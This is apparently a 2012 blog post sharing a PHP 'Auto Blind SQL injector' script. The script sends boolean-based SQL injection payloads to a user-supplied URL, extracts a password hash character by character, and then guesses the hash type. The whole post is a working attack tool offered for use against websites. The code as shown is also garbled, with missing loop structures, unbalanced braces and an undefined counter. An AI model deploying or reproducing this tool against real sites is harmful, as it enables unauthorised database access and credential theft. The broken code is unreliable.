this script use to blind sql injection..
i Hate Blind..
Guess what it is like a guessing
echo "\r\n";
echo "\r\t\r\t##\r\n";
echo "\r\t\r\t# Auto Blind SQL injector #\r\n";
echo "\r\t\r\t# By The Jock[e]r #\r\n";
echo "\r\t\r\t##\r\n";
echo "\r\nURL target :";
$page = trim(fgets(STDIN));//Wait a string and valid url before continue
if(filter_var($page, FILTER_VALIDATE_URL) !== true)//Test if var $page is correct URL
echo "You entered an incorrect URL the program going to shut down automatically.";
echo "\r\nDisplayed word :";
$pattern = trim(fgets(STDIN));//Wait a string before continue
echo "\r\nColumn target :";
$column = trim(fgets(STDIN));//Wait a string before continue
$lenght_max = 98;
echo "\r\n[+]Retrieving password's length...\r\n";
$page2 = file_get_contents($page.urlencode("\" and length($column)=$i-- -"));
$lenght = $i;
echo "\r\nThe password's length is $lenght.\r\n";
$final_pass = "";
$char_min = 20;
$char_max = 140;
$char = $char_min;
$x = 1;
echo "\r\n[+]Retrieving password's hash...\r\n";
echo "\r\nFinal password is : ";
while($x <= $lenght)
$page3 = file_get_contents($page.urlencode("\" and lower(substring($column,$x,1)=char($char))-- -"));
if(preg_match("#$pattern#", $page3))
$final_pass.= strtolower(chr($char));
echo strtolower(chr($char));
$x ++;
$char = $char_min;
$lenght_pass = $lenght;
echo "\r\n\r\n[+]Retrieving hash type...\r\n";
if($lenght_pass == 40)
$type = "sha1";
elseif ($lenght_pass == 32)
$type = "md5";
elseif ($lenght_pass == 13) {
$type = "DES(Unix)";
elseif (preg_match("#\\$1\\$#",$final_pass) AND $lenght_pass == 34) {
$type = "MD5(Unix)";
elseif (preg_match("#\\\$apr1\\$#",$final_pass) AND $lenght_pass == 37) {
$type = "MD5(APR)";
elseif (preg_match("#\\\$h\\$#",$final_pass) AND $lenght_pass == 34) {
$type = "MD5(phpBB3)";
elseif (preg_match("#\\\$p\\$#",$final_pass) AND $lenght_pass == 34) {
$type = "MD5(Wordpress)";
elseif ($lenght_pass == 16) {
$type = "MySQL";
elseif (preg_match("#\\\*#", $final_pass) AND $lenght_pass == 41) {
$type = "MySQL5";
$final_pass = strtoupper($final_pass);
elseif (preg_match("#\\$5\\$#", $final_pass) AND $lenght_pass == 55) {
$type = "SHA-256(Unix)";
elseif(preg_match("#\\$6\\$#", $final_pass) AND $lenght_pass == 98)
$type = "SHA-512(Unix)";
echo "\r\nHash type for $final_pass is ".$type.".\r\n";
Rabu, 20 Juni 2012
Auto Blind SQL injector [PHP]
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